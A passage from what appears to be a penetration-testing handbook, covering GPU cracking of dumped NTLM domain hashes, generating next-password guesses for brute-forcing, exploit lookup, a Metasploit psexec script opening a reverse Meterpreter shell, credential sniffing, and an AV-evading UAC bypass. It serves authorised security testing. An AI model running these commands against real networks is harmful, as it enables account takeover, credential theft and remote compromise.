Rules: 1 
Workload: 16 loops, 8 accel 
Watchdog: Temperature abort trigger set to 80c 
Watchdog: Temperature retain trigger set to 80c 
Device #1: GeForce GTX 680, 2048MB, 1058Mhz, 8MCU 
Device #1: Kernel ./kernels/4318/m2500.sm_30.64.ptx 

Cache-hit dictionary stats list\rockyou.txt: 139921497 bytes, 14343296 words 

[s]tatus [p]ause [r]esume [b]ypass [q]uit => 


oclHashcat Example 


This is a very straightforward example, which says to crack WPAv2 hashes against the out.hccap file 
and use the password list from rockyou.txt. 


Cracking NTLMv2 

If you have compromised a Windows Host or maybe a Domain Controller, you will have to crack 
NTLM hashes. You can always try to crack the LM hashes, but they are becoming more and more 
difficult to find, so we will stick with the NTLM hashes. 


In the following example, we are taking a list of NTLM hashes and using the rockyou password list. 






C:\oclHashcat-plus-0.15>cudaHashcat-plus64.exe -m 1000 NTLM.txt list\rockyou.txt 
cudaHashcat-plus v0.15 by atom starting... 

Hashes: 3 total, 1 unique salts, 3 unique digests 
Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes 
Rules: 1 
Workload: 512 loops, 80 accel 
Watchdog: Temperature abort trigger set to 90c 
Watchdog: Temperature retain trigger set to 80c 
Device #1: GeForce GTX 680, 2048MB, 1058Mhz, 8MCU 
Device #1: Kernel ./kernels/4318/m1000_a0.sm_30.64.ptx 
Device #1: Kernel ./kernels/4318/bzero.64.ptx 

Cache-hit dictionary stats list\rockyou.txt: 139921497 bytes, 14343296 words 

<NTLM hash>:password 
<NTLM hash>:hacker 

Started: Mon Dec 09 09:41:45 2013 
Stopped: Mon Dec 09 09:41:50 2013 


oclHashcat NTLM 


From the example above, there were three unique passwords, but oclHashcat was only able to crack 
two of the three passwords. To increase our chances, I am going to add the passwordspro rule set to 
assist with the rockyou password list. If you want to get a little deeper into understanding these rules, 
try starting at the oclHashcat page: 

http://hashcat.net/wiki/doku.php?id=rule_based_attack . 




[Figure: cudaHashcat-plus64.exe run against NTLM.txt with list\rockyou.txt and -r rules\passwordspro.rule. The startup banner matches the run above (3 hashes, 1 unique salt, 3 unique digests; 512 loops, 80 accel; temperature abort trigger set).]


oclHashcat with Rules 


Using the rules didn't actually find the password for the third hash. In larger password hash lists, this 
would have definitely found more passwords, but was only able to find two out of the three 
passwords in this scenario. 


To increase our chances even more, I will try a much larger password list. This, of course, increases 
the amount of time needed to run this job. However, if it resolves a password, it will be worth it. The 
command to use is: 

• cudaHashcat-plus64.exe -m 1000 NTLM.txt list\realhuman.txt -r rules\passwordspro.rule 







[Figure: cudaHashcat-plus status screen for the run against NTLM.txt with list\realhuman.txt and rules\passwordspro.rule. Recoverable fields: Session.Name: cudaHashcat-plus; Status: Running; Rules.Type: File (rules\passwordspro.rule); Input.Mode: File (list\realhuman.txt); Hash.Target: File (NTLM.txt); Hash.Type: NTLM; Time.Started: Mon Dec 2013; Recovered: 2/3 digests at the moment of the status line, with the cracked third hash printed below it.]


oclHashcat with Different Password List 


As you can see from the results, the new password list and rule set recovered the third password. Just 
by playing around with different password lists and rule sets, you can quickly find out what works 
and what just takes too long to run. This is all based on what types of GPUs you have, how long the 
password lists are, and the complexity of your rule set. 

Whether you want to crack MD5 hashes, MS SQL hashes, SHA1 hashes, or others, this same command 
can be run by changing the "-m" parameter. For a full listing of hashes that oclHashcat accepts and 
cracks, go to: 

https://hashcat.net/wiki/doku.php?id=example_hashes 


Cracking in Real Life 

You were able to successfully dump the Domain Controller. The next step is to see what you are able 
to recover. Historically there were Rainbow tables, but with minimum length restrictions, size and 
time became a huge issue. Trying to create Rainbow tables for 10+ characters becomes so expensive 
that it isn’t really usable on a penetration test (unless you find LM hashes). 














oclHashcat is the fastest password recovery tool that I have ever dealt with. I have used John the 
Ripper and other tools, but due to the use of GPUs, rules, pre-processing, and password lists, I 
generally turn to oclHashcat as my go-to password-cracking tool. This chapter will talk about how to 
effectively use oclHashcat in a pentest and will mostly focus on cracking NTLM hashes; however, 
you can use these examples with any hashes. 

My password cracking rig was presented in the Pre-Game phase and with a little bit of money, you 
can be running your own password cracking monster. 

So, you were able to extract the SUCK Domain Controller hashes. The next step is to be able to see 
what you can recover from those hashes. In our example, we are using a password dump similar to 
what I have seen in the field. Our compromised DC has a list of over 21,000 hashes. We could first 
start by straight brute forcing through all the characters, but is this really feasible? Let’s see by 
running the command: 

• oclHashcat64.exe -m 1000 hashes\hashes.lst -a 3 ?a?a?a?a?a?a?a?a --force 


Command Breakdown: 

• oclHashcat Executable: oclHashcat64.exe 

• -m 1000: The hashes we are supplying are in the NTLM format 

• hashes\hashes.lst: Stored location of the Domain Controller hashes 

• -a 3: Use brute-force attack mode (with the mask below) 

• ?a?a?a?a?a?a?a?a: Eight positions, each of which can be any printable character (upper/lower 
case letters, numbers and specials) 

This definitely isn’t the most efficient way to crack hashes, but it can really cover those odd 
passwords like Jdkl!3vG that might not be in a password list. Masks will be very important to learn, 
so if you haven’t dealt with them before, make sure to check out oclHashcat’s site: 

https://hashcat.net/wiki/doku.php?id=mask_attack 


Remember that we are going for speed and efficiency on a test, so let's see what results the 
brute-force attack will provide: 



[Screenshot: oclHashcat brute-force run. Status: Aborted; Input.Mode: Mask (?a?a?a?a?a?a?a?a) [8]; Hash.Type: NTLM; Time.Started: Sun Jan 18 16:43:57 2015 (14 secs); Time.Estimated: Thu Jan 22 17:37:23 2015 (4 days, 0 hours); Recovered: 0/21318 (0.00%) Digests.] 


oclHashcat Brute-Force 


We can already see that this is going to take four days to go through all eight characters. We could use 
smarter masks based on human tendencies. We know that if there are password requirements, such as 
upper/lower/special character, most people put the capital letter in the front, the special character at 
the end. We could create these custom masks to better improve efficiency, but this will still take a fair 
amount of time. 


For efficiency's sake, the next best step is to start testing large password lists. We are going to focus 
on using two different password lists: Crackstation and m3g9tr0n_Passwords. It is important for you 
to find out which password lists work well in various industries. Let's start with the Crackstation list, 
which contains roughly 64 million passwords: 

• oclHashcat64.exe -m 1000 hashes\hashes.lst lists\crackstation_realhuman_phill.txt --force 


The results below on the left show that in six seconds, we were able to test all the hashes against the 
password list. Using the Radeon R9 295x2, we are able to get some great speed against these lists. 
Unfortunately, the results are pretty low: 780 hashes, or about 3.66%, recovered. 


The next step is to run the hashes against rules. Luckily, oclHashcat has provided a list of great rules 
to run. They are located inside the oclHashcat directory, in the rules folder. I recommend going 
through each of them and understanding what the differences are between the rules. In the next 
example, we are going to use the same password list and, this time, incorporate a great rule set: 

• oclHashcat64.exe -m 1000 hashes\hashes.lst lists\crackstation_realhuman_phill.txt -r rules\InsidePro-PasswordsPro.rule --force 


[Screenshot (left): oclHashcat wordlist run. Status: Exhausted; Hash.Type: NTLM; Time.Started: Sat Jan 17 13:50:34 2015 (6 secs); Recovered: 780/21318 (3.66%) Digests.] 


oclHashcat - Wordlist Cracking 


















[Screenshot (right): the same wordlist run with the InsidePro-PasswordsPro rule set added; the recovered count is given in the text below.] 


oclHashcat - Wordlist Cracking 


In the image above on the right, by using rules, we are processing about 7 million hashes a second, 
which took about 40 seconds. Still well within our time limit, we have now cracked 38% or 8180 
hashes. This is now looking positive. Let's throw another password list at it this time. From the prep 
stages, we should have the eNtrOpY_ALL_sort_uniq.dic that we can use: 

• oclHashcat64.exe -m 1000 hashes\hashes.lst lists\eNtrOpY_ALL_sort_uniq.dic -r rules\InsidePro-PasswordsPro.rule --force 
















[Screenshot: oclHashcat run with lists\eNtrOpY_ALL_sort_uniq.dic and rules\InsidePro-PasswordsPro.rule. Status: Exhausted; Time.Started: Sat Jan 17 13:58:05 2015 (32 secs); Recovered: 10733/21318 (50.35%) Digests.] 


oclHashcat - Adding Rules 


This took about the same amount of time for 122 million passwords, but we were able to go from 
38% up to 50% of recovered hashes in under a few minutes total. 


We can keep playing around with additional rules and make small gains, but at some point the rules 
will stop making a difference. We need to find new words to add to our password list. 


• oclHashcat64.exe -m 1000 hashes\hashes.lst lists\eNtrOpY_ALL_sort_uniq.dic -r rules\InsidePro-HashManager.rule --force 











[Screenshot: oclHashcat run with lists\eNtrOpY_ALL_sort_uniq.dic and rules\InsidePro-HashManager.rule. Status: Exhausted; Time.Started: Sat Jan 17 14:04:38 2015 (50 secs); Recovered: 54.80% of Digests.] 


oclHashcat - Additional Password Lists 


Back in the prep stages, we created some custom password lists using two tools, Wolfhound (for 
words from Twitter/Reddit/Websites) and the custom webscraping tool. Let’s take those lists and run 
some additional cracks against them: 

• oclHashcat64.exe -m 1000 hashes\hashes.lst lists\10k_and_scraped_passwords.txt -r rules\InsidePro-PasswordsPro.rule --force 






























We now are at 55% of passwords cracked, but still have a long way to go. 


Prince: 

Prince is a password guess generator and can be thought of as an advanced Combinator attack. Rather 
than taking input from two different dictionaries and outputting all the possible two-word 
combinations, Prince only has one input dictionary and builds "chains" of combined words 
(http://reusablesec.blogspot.com/2014/12/tool-deep-dive-prince.html). Prince was introduced in late 
2014 to advance the attacks on password guessing. As more and more people started using complex 
passwords, following the example set by this xkcd comic strip, http://xkcd.com/936/, it became 
harder to guess passwords. 

What Prince does is take a password list and generates all the different combinations it can. If you 
have a list with: 

• a 

• cat 

• house 


It will build a list of passwords: 

• acat 

• ahouse 

• acathouse 

• ahousecat 

• cata 

• cathouse 

• catahouse 

• cathousea 

• ... and so on. 

Using this technique, we can take some of our favorite password lists and generate great password 
combination lists. We will start with a small list of passwords, add our custom words and start 
building from there. In this case, I used the following password list, which had a good number of 
basic passwords: 

• https://raw.githubusercontent.com/discourse/discourse/master/lib/commonpasswor 

common-passwords.txt 

Next, I added the words scraped from the Bloodhound and Webscraper examples. In total, I have 
about 15,000 words to create these different password lists. For example: 

• princeprocessor-0.19\pp64.exe --pw-min=9 --pw-max=10 -o pp.txt < lists\10k_and_scraped_passwords.txt 







Command Breakdown: 

• princeprocessor Executable: pp64.exe 

• --pw-min=9: Minimum password length of 9 characters 

• --pw-max=10: Maximum password length of 10 characters 

• -o pp.txt: Output to a file called pp.txt 

• < lists\10k_and_scraped_passwords.txt: List of the 10k wordlist and scraped words 

• *One additional optional flag is --elem-cnt-max=NUM. This defines how 
many words can be put together to make a chain. 

The output of pp.txt is about 272 MB. If we take a look at the files, we see the combined wordlists. 
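As an added illustration (not princeprocessor's own code), here is a simplified PRINCE-style generator for the chain behaviour described above, using the three-word list from the text. That words may repeat within a chain, and that output comes out in plain recursive order rather than PRINCE's keyspace-ordered schedule, are assumptions of this example.

```python
"""Added example (not princeprocessor's own code): a simplified PRINCE-style
chain generator. From one input wordlist it emits every ordered chain of
1..elem_cnt_max words whose total length lies in [pw_min, pw_max], which is
what the --pw-min/--pw-max/--elem-cnt-max flags above control. Assumptions:
words may repeat within a chain, and output order is plain recursion rather
than PRINCE's keyspace-ordered scheduling."""
from typing import Iterator, List

def prince_chains(words: List[str], pw_min: int, pw_max: int,
                  elem_cnt_max: int = 8) -> Iterator[str]:
    """Yield chains with pw_min <= len(chain) <= pw_max."""
    vocab = sorted(set(w for w in words if w))      # dedupe, drop empty lines

    def extend(prefix: str, depth: int) -> Iterator[str]:
        for w in vocab:
            cand = prefix + w
            if len(cand) > pw_max:       # nothing built on this can get shorter
                continue
            if len(cand) >= pw_min:
                yield cand
            if depth + 1 < elem_cnt_max:
                yield from extend(cand, depth + 1)

    return extend("", 0)

def chain_count(words: List[str], pw_min: int, pw_max: int,
                elem_cnt_max: int = 8) -> int:
    """Size of the candidate set a run would write to disk; worth checking
    before a run, since the book's 10-12 character file grew to 61 GB."""
    return sum(1 for _ in prince_chains(words, pw_min, pw_max, elem_cnt_max))

if __name__ == "__main__":
    # The book's three-word list: a, cat, house
    for cand in prince_chains(["a", "cat", "house"], 4, 9, 3):
        print(cand)
    print(chain_count(["a", "cat", "house"], 4, 9, 3), "candidates")
```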


[Screenshot: C:\Users\cheetz\Downloads\oclHashcat-1.32\pp.txt opened in Notepad++, showing combined words around line 14,163,330.] 


Prince - Password Generator 


As we see from the pp.txt file above, there are words that we would never have had in our original 
password list. What if we create a file with passwords sized between 10-12 characters? 

• princeprocessor-0.19\pp64.exe --pw-min=10 --pw-max=12 -o pp10_12.txt < lists\10k_and_scraped_passwords.txt 

The new file size is now 61GB. This shows that the file sizes grow exponentially and can get 
extremely large very quickly. What if we run the 10-12 character Prince-generated wordlist against 
our DC hash dump? 

• oclHashcat64.exe -m 1000 hashes\hashes.lst pp10_12.txt -r rules\InsidePro-HashManager.rule --force 












Prince - Password Cracking 


The hash output recovery went from 11790 to 11920 in 43 minutes. Although these aren't significant 
gains, these could be the passwords that we really care about. One interesting note is that on a lot of 
different pentests, I have noticed that users who have extremely long passwords usually have higher 
privileges. Usually, someone in the IT or Security groups will be the one with the most permissions. 


The last example is that we can actually pipe the results from Prince processor straight into 
oclHashcat. Let’s look for words between 13 and 14 characters and run the InsidePro-HashManager 
rule against those words. 


• princeprocessor-0.19\pp64.exe --pw-min=13 --pw-max=14 < lists\10k_and_scraped_passwords.txt | oclHashcat64.exe -m 1000 hashes\hashes.lst -r rules\InsidePro-HashManager.rule --force 































[Screenshot: oclHashcat fed by princeprocessor over a pipe. Input.Mode: Pipe; Rules.Type: File (rules\InsidePro-HashManager.rule); Status: Aborted; Time.Started: Sun Jan 18 12:02:29 2015 (42 mins, 10 secs); Recovered: 11955/21318 (56.08%) Digests.] 


Prince - Modifications 


After about 40 minutes, we have gone past the 56% rate. So in the total of 2 hours, we have cracked 
about 12,000 out of the 21,000 password hashes using all open source and readily available 
information. Taking it to the next step would be to focus on the targeted employees, pull additional 
password dumps, and lastly start brute forcing. 


• C:\oclHashcat-1.32>.\hashcat-utils-1.1\morph.exe lists\crackstat_realhuman_phill.txt 20 3 3 12 > testrule.txt 

• C:\oclHashcat-1.32>oclHashcat64.exe -m 1000 hashes\hashes.lst lists\crackstat_realhuman_phill.txt -r testrule.txt --force 










Morph Example 


Now, we are going to go against the large crackstation password list. 


• oclHashcat64.exe -m 1000 hashes\hashes.lst \Users\cheetz\Desktop\Kali_Share\realuniq.lst -r rules\rockyou-30000.rule --force 



























[Screenshot: oclHashcat run with realuniq.lst and rules\rockyou-30000.rule. Status: Exhausted; Hash.Type: NTLM; Time.Started: Mon Feb 02 23:19:55 2015 (53 mins, 7 secs); Recovered: 14275/21318 (66.96%) Digests.] 


oclHashcat - Results 


After about four hours of cracking, we are almost at 70%. This is just a start on how I approach 
password cracking. Usually, I will go after more custom passwords and try more complex rules to get 
to that 90%+. 


Retesting Passwords: What if after a test, they change all their passwords? What if we increment 
their old password by a value of 1? 


• oclHashcat64.exe -m 1000 hashes\hashes.lst --show > password_list.txt 

• type password_list.txt 

• testl:509019:aad3b435b51404eeaad3b435b51404ee:64fl2cddaa88057e06a81b54e 

• test3:498809:aad3b435b51404eeaad3b435b51404ee:523971d356ffcaaa96cfb6959'/ 

• test4:496638:aad3b435b51404eeaad3b435b51404ee:4636190bde3bb52ad2d29ca3' 

• test5:520315:aad3b435b51404eeaad3b435b51404ee:b8ffa37b7c490aaf0e5661fad3 










There have been penetration tests where I compromised a domain and was successful in 
pulling/cracking hashes. The client patched all the findings, reset all the passwords of those users, 
and asked for a remediation test. 


After testing and validating that everything was fixed, I took it one step further. I wanted to make sure 
that the users didn’t just change their password by incrementing by one. We have seen a ton of 
password breaches and leaks in the past and we want to make sure that users are smarter than just 
incrementing by a single number. 


I have developed Password Plus One, which takes the output from oclHashcat and, regardless of special 
characters, increases the last integer by one. For example, if the password is i<3turtles09, the new 
password generated is i<3turtles10. 


If we take our last output and we read the hashes, it will look something like: 

root@kali:/opt/Password_Plus_One# cat /mnt/hgfs/oclHashcat-1.32/password_list.txt 

• jsmith:1::64f12cddaa88057e06a81b54e73b949b::::Password1 

• plee:2::f9671733342b19ec0753bd34892cc4c3::::Nina2014 

• ssmith:3::176b4c6fbb0a54cd5a693b57fe887465::::i<3turtles09 

• jwatts:5::9f00b7969b887b7e21a736c09328d083::::TodayisToday 

• bjones:6::d3b4e97bb637cd629ef5b9f5d7bd5064::::Toneth2$ 

We want to run password_plus_one on our large password list: 

• cd /opt/Password_Plus_One 

• python ./password_plus_one.py 

o Enter the location of the oclHashcat output 

o A new file will be created with a list of Usernames/New Passwords 
to new_password_list.txt 
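As an added example (not the book's Password_Plus_One script), the same +1 rule written as a rotation-audit check: it parses the --show line format shown above, bumps the last number of each old password, and reports users whose new password is only the old one plus one. The sample lines and the no-digit behaviour are assumptions.

```python
"""Added example (not the book's password_plus_one.py): the "bump the last
number by one" rule described above, plus a defender-side use of it, namely
flagging post-reset passwords that are only the old one plus one. Input is
the user:rid:lm:ntlm:::password line format that oclHashcat --show writes
for pwdump-style input. The sample lines below are constructed."""
import re
from typing import Dict, Optional, Tuple

_LAST_DIGITS = re.compile(r"(\d+)(\D*)$")   # final digit run + trailing symbols

def plus_one(password: str) -> str:
    """Increment the last run of digits, keeping its zero-padded width and any
    trailing non-digits ('$', '!'). No digits at all: append '1' (assumption)."""
    m = _LAST_DIGITS.search(password)
    if not m:
        return password + "1"
    digits, tail = m.group(1), m.group(2)
    bumped = str(int(digits) + 1).zfill(len(digits))
    return password[:m.start(1)] + bumped + tail

def parse_show_line(line: str) -> Optional[Tuple[str, str]]:
    """(user, password) from one --show line; the password is everything after
    the seventh colon, so colons inside the password survive."""
    parts = line.rstrip("\r\n").split(":", 7)
    if len(parts) < 8 or not parts[0]:
        return None
    return parts[0], parts[7]

def load_show(text: str) -> Dict[str, str]:
    return dict(p for p in map(parse_show_line, text.splitlines()) if p)

def is_trivial_rotation(old: str, new: str) -> bool:
    """True when the new password is just the old one bumped by one."""
    return new == plus_one(old)

def audit_rotation(before: Dict[str, str], after: Dict[str, str]) -> Dict[str, str]:
    """Users whose post-reset password is old+1, mapped to that new password."""
    return {u: after[u] for u in before
            if u in after and is_trivial_rotation(before[u], after[u])}

# Constructed --show output from before and after a forced reset; the hash
# field is a placeholder, not a real digest.
BEFORE = """jsmith:1::<ntlm_hash>::::Password1
plee:2::<ntlm_hash>::::Nina2014
ssmith:3::<ntlm_hash>::::i<3turtles09
bjones:6::<ntlm_hash>::::Toneth2$"""
AFTER = """jsmith:1::<ntlm_hash>::::Password2
plee:2::<ntlm_hash>::::Tr0ub4dor&3
ssmith:3::<ntlm_hash>::::i<3turtles10
bjones:6::<ntlm_hash>::::Toneth3$"""

if __name__ == "__main__":
    for user, new in audit_rotation(load_show(BEFORE), load_show(AFTER)).items():
        print(f"{user}: reset to a +1 password ({new})")
```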



[Screenshot: password_plus_one.py run. It prints its banner and description, the oclHashcat --show command used to create its input, and the expected input format, prompts for the location of the password list in oclHashcat format, then prints one line per user, for example User:ssmith,Old Password:i<3turtles09,New Password:i<3turtles10 and User:bjones,Old Password:Toneth2$,New Password:Toneth3$, and finishes with "Username/Password list saved to new_password_list.txt".] 


P+1 - Password Modification 


Now, you can feed this into a brute forcer for web applications, SSH, or even Outlook Web 
Application (OWA). On decent sized clients, this attack usually leads back into multiple accounts and 
into the company. 


Vulnerability Searching 


A huge part about being a pentester is being able to find vulnerabilities in applications and services. 
From the Nmap scans, vulnerability scans, and from poking around, you will identify all sorts of 
versions for these applications and services. 


Generally, I will take the results from Nmap banners and the vulnerability scanner and query the 
identified versions of the applications against the following sites/tools to find exploits: 


Searchsploit (Kali Linux) 



Searchsploit is a default query tool that will search through publicly known exploits based on a 
search string you provide. You can provide part of the title or application to find an exploit. There 
are a good number of exploits here and most of them have code or scripts ready to run. One thing I 
want to strongly urge is to make sure that you test them in a lab environment before testing them on 
production systems. 

On your Kali host, run searchsploit. 


[Screenshot: the Kali Linux Applications menu.] 


Searchsploit 


For this example, let's say I found a Joomla site and I want to see if there are any vulnerabilities for 
this application. To query searchsploit, I will craft a query like: 
searchsploit joomla 


[Screenshot: searchsploit joomla results, a two-column listing of exploit titles (Joomla Kunena Component, Joomla Spider Catalog, Joomla JooProperty 1.13.0 Multiple Vulnerabilities, Joomla! <= 3.0.2 (highlight.php) PHP Object Injection, and so on) beside paths such as /php/webapps/22153.pl.] 


Searchsploit Results 


Just from a quick query for Joomla, we currently have 906 different vulnerabilities. Let's take a look 
at one of them to get an idea of what it looks like. One thing to note is that the paths in the results are 
not the full paths. All searchsploit files are located under /usr/share/exploitdb/. To view the 
vulnerability or exploit code, type the following: 

cat /usr/share/exploitdb/platforms/php/webapps/22153.pl 


[Screenshot: the first lines of /usr/share/exploitdb/platforms/php/webapps/22153.pl. The header comments give the exploit title (Joomla Component com_kunena SQL Injection exploit), a Google dork, the author, a screenshot link and the vendor homepage (http://www.joomla.org/); the script then prompts for a target, sends a crafted com_kunena userlist request with LWP::UserAgent, and prints any 32-character hex value it finds in the response.] 


22153 Perl Joomla Exploit Example 


The 22153.pl is a Perl script to perform an SQL injection against a certain version of Joomla. If 
successful, the Perl script will return the password of the administrator. 


Bugtraq 

(http://www.securityfocus.com/bid) 

Security Focus’s BugTraq is an excellent source for finding vulnerabilities and exploits. You can 
search vulnerabilities by CVEs or by vendor/product types at: http://www.securityfocus.com/bid. 

In the example below, I was looking for some Adobe ColdFusion exploits and seemed to have found 
quite a few. 





[Screenshot: the SecurityFocus vulnerability search at www.securityfocus.com/bid with Vendor: Adobe and Title: ColdFusion selected, listing results such as Adobe ColdFusion CVE-2010-5290 Authentication Bypass Vulnerability, Adobe ColdFusion CVE-2013-0632 Authentication Bypass Vulnerability and Adobe ColdFusion CVE-2013-3349 Remote Denial of Service Vulnerability.] 


BugTraq 



Exploit-db 

(http://www.exploit-db.com) 


This site has definitely grown and I really see it as the replacement for the good old milw0rm. 
Many researchers will post their exploits and research to Exploit-DB, which is completely 
searchable. I recommend that you spend some time on Exploit-DB as it is a great resource. 


Exploit-DB 


Querying Metasploit 


You can't forget Metasploit as a great resource for finding vulnerabilities. 

• On your Kali host, in a terminal type: msfconsole 

• And to find an exploit or auxiliary module, type: search [what you want to find] 


In the following example, I search for all ColdFusion modules. 


[Screenshot: the msfconsole banner followed by the command: msf > search coldfusion] 


Tips and Tricks 


This section is dedicated to things that didn't really have a place in the other sections, but might be 
able to make your job much easier. 


RC Scripts Within Metasploit 


Since I try to encourage efficiency, some scripts that you should look into are Metasploit's resource 
(RC) scripts. These scripts can be created to help speed up common tasks you might perform. For this 
example, I am creating a script to use the PSExec module, use smart_migrate to migrate the 
Meterpreter process into another PID, and fill in the other information required for the attack. 

We will save the following code to demo.rc: 

• use exploit/windows/smb/psexec 

• set rhost 192.168.10.10 

• set smbuser Administrator 

• set smbpass _hash_or_password_ 

• set smbdomain _domain_ 

• set payload windows/meterpreter/reverse_tcp 

• set AutoRunScript post/windows/manage/smart_migrate 

• setg lport 443 

• setg lhost 192.168.10.3 

To run the script, from a shell prompt enter: 

• msfconsole -r /root/demo.rc 



[Screenshot: msfconsole -r demo.rc processing the resource file line by line (use exploit/windows/smb/psexec, set rhost 192.168.10.10, set smbuser Administrator, set smbpass password, set smbdomain fakeDomain, set payload windows/meterpreter/reverse_tcp, set AutoRunScript post/windows/manage/smart_migrate, setg lport 443).] 


RC Scripts 


All you have to do after it loads is type: exploit. This script starts up Metasploit, authenticates to 
192.168.10.10 using PSExec, drops and executes the Meterpreter payload, and connects that box back 
to your host to gain a full Meterpreter shell. 


This is a much faster way to prepare your scripts, exploits, and especially handlers. I like to add 
features like auto-migrate or add custom payloads to exploits. 


Windows Sniffer 


There might be times when you need to start a sniffer on the host system. This can be done on 
any Win7 or higher OS with Administrative Privileges, without any additional software. {47} {48} 

• netsh trace start capture=yes overwrite=no tracefile=C:\Users\Public\sniff.etl 

• netsh trace stop 

To convert the etl file to something we can view in Wireshark (.cap file), we have to do the 
following: 


• On Win 8, first install Message Analyzer: 

o http://www.microsoft.com/en-us/download/details.aspx?id=44226 

• Run the command: 

o powershell -exec bypass -command "import-module PEF; $s = New-PefTraceSession -Path 'C:\Users\Public\OutFile.Cap' -SaveOnStop; $s | Add-PefMessageProvider -Provider 'C:\Users\Public\sniff.etl'; $s | Start-PefTraceSession" 


The output will be located in C:\Users\Public\OutFile.Cap, where you can just open this file in 
WireShark. Remember that by default, it only captures 250MB, so if you need more space, specify the 
MaxSize=<Size> switch. 


So, what do you do after you capture a lot of different network traffic? You need to parse through it. 
We are going to use a tool called net-creds developed by Dan McInerney. Net-creds is a tool that 
sniffs passwords and hashes from a pcap file. It will include URLs, usernames/passwords in cleartext, 
SNMP, SMTP, NTLM, and Kerberos. Since this tool only takes in pcap files, it is important to first 
convert your cap file to a pcap file. I usually do this by loading the cap file into Wireshark and saving 
it back as a pcap. Once we have a pcap file, we can run the following commands: 

• cd /opt/net-creds 

• python net-creds.py -p [pcap file] 


root@kali:/opt/net-creds# python net-creds.py -p OutFile.pcap 
[192.168.1.85] GET next-services.apps.microsoft.com/ 
[192.168.1.85:49764 > 192.168.210.76:21] FTP User: hacker 
[192.168.1.85:49764 > 192.168.210.76:21] FTP Pass: password 
[192.168.210.76:21 > 192.168.1.85:49764] Authentication: authentication successful 
[192.168.1.85:51234 > 192.168.210.76:445] NETNTLMv2: lab::hacker.testlab:... 


Bypass UAC 


There are times when you might have an administrative account and a Meterpreter session, but you 
can't become system by using the "getsystem" command. This is most likely because User Account 
Control (UAC) protection is blocking you from running the getsystem command. 


In the past and in the previous book, we used either a custom upload of bypassUAC from David 
Kennedy or the Metasploit module bypassuac. The issue was that it had to drop an executable, 
which would generally spawn a second file as well. I have often seen instances where AV would 
pick up either one of the two files. 


To get around this, I migrated from using bypassuac to using bypassuac_injection. This module uses 
the Reflective DLL Injection technique to drop only the DLL payload binary instead of the three 
separate binaries in the standard technique. The reason I switched is that I have had better luck 
evading AV with DLLs than with executables. If you need to use a custom DLL, you can always set 
EXE::Custom to your DLL. Let’s walk through an example where you need to get to system quickly. 


You might see something like this: 



• msf exploit(bypassuac_injection) > sessions -i 1 

• [*] Starting interaction with 1... 

• meterpreter > getsystem 

• [-] priv_elevate_getsystem: Operation failed: The environment is incorrect. 


If you do have an administrative account, most likely UAC is blocking execution, which is enabled by 
default. To get around this, you will need to background the current Meterpreter process, use the 
bypassuac injection module, set your options, and run it: 

• meterpreter > background 

• [*] Backgrounding session 1... 

• msf exploit(bypassuac_injection) > use exploit/windows/local/bypassuac_injection 

• msf exploit(bypassuac_injection) > set target 1 

• target => 1 

• msf exploit(bypassuac_injection) > set PAYLOAD windows/x64/meterpreter/reverse_https 

• PAYLOAD => windows/x64/meterpreter/reverse_https 

• msf exploit(bypassuac_injection) > exploit 


Note that if you are targeting an x64 host, you need to make sure to set the PAYLOAD to a 64-bit 
payload and set the target to “1”, which is a Windows 64-bit OS. 


msf exploit(bypassuac_injection) > exploit 

[*] Started HTTPS reverse handler on https://0.0.0.0:8443/ 
[*] UAC is Enabled, checking level... 
[+] UAC is set to Default 
[+] BypassUAC can bypass this setting, continuing... 
[+] Part of Administrators group! Continuing... 
[*] Uploading the Payload DLL to the filesystem... 
[*] Spawning process with Windows Publisher Certificate, to inject into. 
[+] Successfully injected payload in to process: 1432 
[*] 172.16.151.202:53352 Request received for /EWSm... 
[*] 172.16.151.202:53352 Staging connection for target /EWSm received... 
[*] Meterpreter session 2 opened (...:8443 -> 172.16.151.202:53352) at ...-06 21:16:37 -0500 

meterpreter > background 
[*] Backgrounding session 2... 
msf exploit(bypassuac_injection) > session -i 2 
[-] Unknown command: session. 
msf exploit(bypassuac_injection) > sessions -i 2 
[*] Starting interaction with 2... 

meterpreter > getsystem 
...got system (via technique 1) 


BypassUAC 


Now, you can do hashdumps, mimikatz, or any other command that requires system privileges. 


Kali Linux Nethunter 



Every so often, I need to do a little penetration testing on the go. A great portable solution for this is 
Kali Linux NetHunter. 


“The Kali Linux NetHunter project is the first Open Source Android penetration testing platform for 
Nexus devices, created as a joint effort between the Kali community member “BinkyBear” and 
Offensive Security. NetHunter supports Wireless 802.11 frame injection, one-click MANA Evil 
Access Point setups, HID keyboard (Teensy-like attacks), as well as BadUSB MITM attacks.”{49} 

Out of the box, NetHunter works pretty easily with Nexus 5, Nexus 7, or Nexus 10. To install, 
download the NetHunter Installer from: 

https://www.offensive-security.com/kali-linux-nethunter-download/. 


Run the executable, and follow the install instructions. 



Installing NetHunter 


Installation is pretty straightforward and once you have it all configured, NetHunter is ready to go. 
Going to the tablet, you will be brought to the screen below. To start using NetHunter, drop into the 
NetHunter App. 
Nethunter Start Screen 


If we drop into the “Launch Kali Shell in Terminal” we can type “msfconsole” and drop straight into 
Metasploit. NetHunter has a lot of abilities, such as attacking WIFI networks, setting up access points, 
malicious DNS servers, and more. 



root@kali:~# msfconsole 
[*] Starting the Metasploit Framework console... 

       =[ metasploit v4.11.0-2015013101 [core:4.11.0.pre.2015013101 api:1.0.0] 
+ -- --=[ 1369 exploits - 788 auxiliary - 223 post 
+ -- --=[ 356 payloads - 37 encoders - 8 nops 
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp 


Nethunter - Metasploit 


One of the attacks is similar to the Rubber Ducky attack. This attack is called the “HID Keyboard 
Attack” and allows the Nexus device to emulate a keyboard and press keystrokes onto the machine 
once it is plugged into a computer. To access the HID tool, on the top-left menu, we can drop to “HID 
Keyboard Attack.” 


NetHunter Android menu: 
  NetHunter Home 
  Kali Launcher 
  Kali Service Control 
  HID Keyboard Attack 
  BadUSB MITM Attack 
  MANA Evil Access Point 
  Dnsmasq Service 
  Iptables Configuration 

HID Keyboard Attack - UAC Bypass panel, with Keyboard Layout options and the 
Execute Attack / Reset USB / Update buttons. 


Nethunter HID Attack 


You might have to configure the UAC Bypass and once the device is plugged into a computer, just hit 
execute. The great part about this tool is that it is flexible, easy to configure, and quick to use. You 
might be on a physical engagement, where you are walking around the office. You see someone leave 
their workstation unlocked to leave for lunch. You don’t want to be sitting there typing commands on 
their machine. Instead, you might be able to plug your NetHunter device into a USB port and hit 
